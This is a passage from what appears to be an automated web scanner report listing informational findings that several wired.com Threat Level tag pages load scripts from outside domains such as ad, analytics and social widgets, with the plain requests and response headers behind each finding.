Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:07 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=29
Expires: Wed, 12 Jan 2011 15:34:10 GMT
Date: Wed, 12 Jan 2011 15:33:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.149. http://www.wired.com/threatlevel/tag/dmca/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/dmca/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/dmca/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.150. http://www.wired.com/threatlevel/tag/facebook/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/facebook/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/facebook/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:35:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=61
Expires: Wed, 12 Jan 2011 15:35:05 GMT
Date: Wed, 12 Jan 2011 15:34:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.151. http://www.wired.com/threatlevel/tag/fbi/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/fbi/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/fbi/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.152. http://www.wired.com/threatlevel/tag/file-sharing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/file-sharing/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/file-sharing/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:54:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=475
Expires: Wed, 12 Jan 2011 15:42:07 GMT
Date: Wed, 12 Jan 2011 15:34:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.153. http://www.wired.com/threatlevel/tag/first-amendment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/first-amendment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/first-amendment/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.154. http://www.wired.com/threatlevel/tag/google/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/google/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/google/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:33:32 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:15 GMT
Date: Wed, 12 Jan 2011 15:34:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.155. http://www.wired.com/threatlevel/tag/hack/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/hack/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/hack/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.156. http://www.wired.com/threatlevel/tag/hacking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/hacking/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/hacking/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:14 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:42:19 GMT
Date: Wed, 12 Jan 2011 15:34:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.157. http://www.wired.com/threatlevel/tag/intellectual-property/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/intellectual-property/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/intellectual-property/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:21:42 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:26 GMT
Date: Wed, 12 Jan 2011 15:34:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.158. http://www.wired.com/threatlevel/tag/mpaa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/mpaa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/mpaa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:20:07 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=433
Expires: Wed, 12 Jan 2011 15:41:44 GMT
Date: Wed, 12 Jan 2011 15:34:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.159. http://www.wired.com/threatlevel/tag/nsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/nsa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/nsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:50:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:32 GMT
Date: Wed, 12 Jan 2011 15:34:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.160. http://www.wired.com/threatlevel/tag/obama/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/obama/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/obama/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.161. http://www.wired.com/threatlevel/tag/piracy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/piracy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/piracy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:19 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:42:52 GMT
Date: Wed, 12 Jan 2011 15:34:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.162. http://www.wired.com/threatlevel/tag/pirate-bay-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/pirate-bay-trial/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/pirate-bay-trial/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:16:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:12 GMT
Date: Wed, 12 Jan 2011 15:35:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.163. http://www.wired.com/threatlevel/tag/pirate-bay/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/pirate-bay/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/pirate-bay/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
